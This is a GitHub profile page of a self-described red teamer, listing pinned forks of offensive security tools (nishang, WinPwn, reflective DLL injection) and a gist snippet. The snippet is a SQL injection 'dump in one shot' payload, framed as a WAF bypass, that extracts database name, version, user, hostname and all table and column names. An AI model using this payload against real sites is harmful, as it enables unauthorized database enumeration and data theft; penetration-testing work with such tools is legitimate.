Skip to content
View Sic4rio's full-sized avatar
🧬
Focused 🎯
🧬
Focused 🎯
  • Somewhere
Block or Report

Block or report Sic4rio

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
Sic4rio/README.md

Welcome To My Github

Sicari0

```zsh > neofetch ```

logo.png

sic4rio@github
----------------

       OS  :  macOS arm64
       WM  :  anon
    Shell  :  zsh 666
 Terminal  :  TmuX
      CPU  :  Apple M1
    Alias  :  cs/checksum
Languages  :  C, Bash, Python, HTML, Javascript
  ID  :  6660001337000666

                                                          #474342 #fbedf6 #c9594d #f8b9b2 #f8b9b2

I'm a Red teamer based in Australia 🇦🇺

  • 🔭 Bug Hunter- Mal Dev - Skid Killer.
  • 🤔 I’m not active on here and keep this for private use...
  • 💬 DM me.
  • ⚡ Sicario: A hired gunman or assassin.

SIC4RI0's github statsSIC4RI0's github stats

TryHackMe

  

Pinned Loading

  1. alpha-wifi-adapter-drivers alpha-wifi-adapter-drivers Public

  2. ADModule ADModule Public

    Forked from samratashok/ADModule

    Microsoft signed ActiveDirectory PowerShell module

    PowerShell

  3. DIOS (Dump In One Shoot) Collection ... DIOS (Dump In One Shoot) Collection bypass WAF
    1
    DIOS (Dump In One Shot) Collection
    2
    
                  
    3
    =======================================
    4
    
                  
    5
    concat_ws('<br>','zet',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))
  4. nishang nishang Public

    Forked from samratashok/nishang

    Nishang - Offensive PowerShell for red team, penetration testing and offensive security.

    PowerShell

  5. ReflectiveDLLInjection ReflectiveDLLInjection Public

    Forked from stephenfewer/ReflectiveDLLInjection

    Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.

    C

  6. WinPwn WinPwn Public

    Forked from S3cur3Th1sSh1t/WinPwn

    Automation for internal Windows Penetrationtest / AD-Security

    PowerShell